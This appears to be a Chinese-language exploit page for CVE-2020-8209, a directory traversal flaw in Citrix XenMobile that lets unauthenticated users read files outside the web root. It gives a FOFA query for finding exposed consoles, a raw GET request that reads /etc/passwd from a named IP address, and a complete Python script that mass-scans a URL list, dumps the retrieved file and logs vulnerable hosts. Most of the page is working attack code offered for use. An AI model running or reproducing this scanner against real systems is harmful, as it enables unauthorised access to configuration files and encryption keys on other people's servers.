跳转至

CVE-2020-8209 XenMobile(Citrix Endpoint Management) 目录遍历漏洞

利用此漏洞,可以读取Web服务器根目录之外的任意文件,包括配置文件和敏感的加密密钥。剥削不需要授权。在文件help-sb-download.jsp中标识了易受攻击的代码:

fofa:

app="XenMobile-控制台"

PoC:

GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1
Host: 88.212.26.164

批量检测脚本:

CVE-2020-8209-Multiple.py:

#!/usr/bin/env python
# coding:utf-8
# author:B1anda0

import requests,sys,colorama
from colorama import *
init(autoreset=True)


banner='''\033[1;33;40m
  _______      ________    ___   ___ ___   ___         ___ ___   ___   ___  
 / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \       / _ \__ \ / _ \ / _ \ 
| |     \ \  / /| |__ ______ ) | | | | ) | | | |_____| (_) | ) | | | | (_) |
| |      \ \/ / |  __|______/ /| | | |/ /| | | |______> _ < / /| | | |\__, |
| |____   \  /  | |____    / /_| |_| / /_| |_| |     | (_) / /_| |_| |  / / 
 \_____|   \/   |______|  |____|\___/____|\___/       \___/____|\___/  /_/  

'''


def XenMobile():
        headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"}
        payload= '/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd'
        poc=urls+payload
        try:
                requests.packages.urllib3.disable_warnings()#解决InsecureRequestWarning警告
                response=requests.get(poc,headers=headers,timeout=10,verify=False)
                if response.status_code==200 and "root" in response.content:
                        print(u'\033[1;31;40m[+]{} is citrix xenmobile directory traversal vulnerability'.format(urls))
                        print(response.content)
                        #将漏洞地址输出在Vul.txt中
                        f=open('./vul.txt','a')
                        f.write(urls)
                        f.write('\n')
                else:
                        print('\033[1;32;40m[-]{} None'.format(urls))
        except:
                print('{} request timeout'.format(urls))


if __name__ == '__main__':
        print (banner)
        if len(sys.argv)!=2:
                print('Example:python CVE-2020-8209.py url.txt')
        else:
                file = open(sys.argv[1])
                for url in file.readlines():
                        urls=url.strip()
                        if urls[-1]=='/':
                                urls=urls[:-1]
                        XenMobile()
                print ('Check Over')

使用方法:Python CVE-2020-8209-Multiple.py url.txt

ref;

https://github.com/B1anda0/CVE-2020-8209

https://forum.ywhack.com/thread-114707-1-3.html